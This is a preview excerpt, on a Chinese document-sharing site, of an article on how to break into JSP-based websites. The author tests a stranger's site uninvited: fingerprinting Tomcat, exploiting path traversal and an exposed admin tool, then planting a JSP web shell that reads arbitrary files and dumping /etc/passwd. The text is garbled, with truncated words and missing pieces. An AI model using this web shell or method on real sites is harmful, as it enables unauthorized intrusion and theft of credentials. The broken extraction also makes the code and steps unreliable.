欢迎来到天天文库
浏览记录
ID:24932019
大小:52.00 KB
页数:3页
时间:2018-11-17
《如何入侵基于jsp的网站》由会员上传分享,免费在线阅读,更多相关内容在学术论文-天天文库。
1、如何入侵基于JSP的网站>>教育资源库很偶然的一个机会,浏览到一个网站,页面清新让人感觉很舒服。网站是用JSP开发的,出于个人爱好,我决定测试一下其系统的安全性。tel.target.8080GET/CHINANSLHTTP/1.1[Enter][Enter] 返回的结果如下:HTTP/1.0404NotFoundDate:Sun,08Jul200107:49:13GMTServlet-Engine:TomcatlStatus:404〈h1〉Error:404〈/h1〉〈h2〉Location:/CHINANSL〈/h2〉FileNotFound〈br〉/CHINANSL 获得了运行的ca
2、t3.1”。记得曾经发现过这个版本的漏洞,并且post到bugtrap上去过。 回忆一下,大概是通过“..”技术可以退出cat3.1自带了一个管理工具,可以查看in/ 管理员果然没有删除或禁止访问这个目录,从安全的角度说,这点应该算是一个比较重要的失误。 接着,点击“VIEport="java.io.*"%〉〈%Stringfile=request.getParameter("file");Stringstr="";FileInputStreamfis=null;DataInputStreamdis=null;try{fis=ne(file);dis=ne(fis);while(true
3、){try{str=dis.readLine();}catch(Exceptione){}if(str==null)break;out.print(str+"〈br〉");}}catch(IOExceptione){}%〉 然后执行:target:8080/upload/test.jsp?file=/etc/passwd 密码出来了。接下来的过程是猜测密码,没有成功。不过,现在相当于有了一个SHELL,猜不出密码可以先把IE当作SHELL环境。9731248:>>>>这篇文章来自..,。
此文档下载收益归作者所有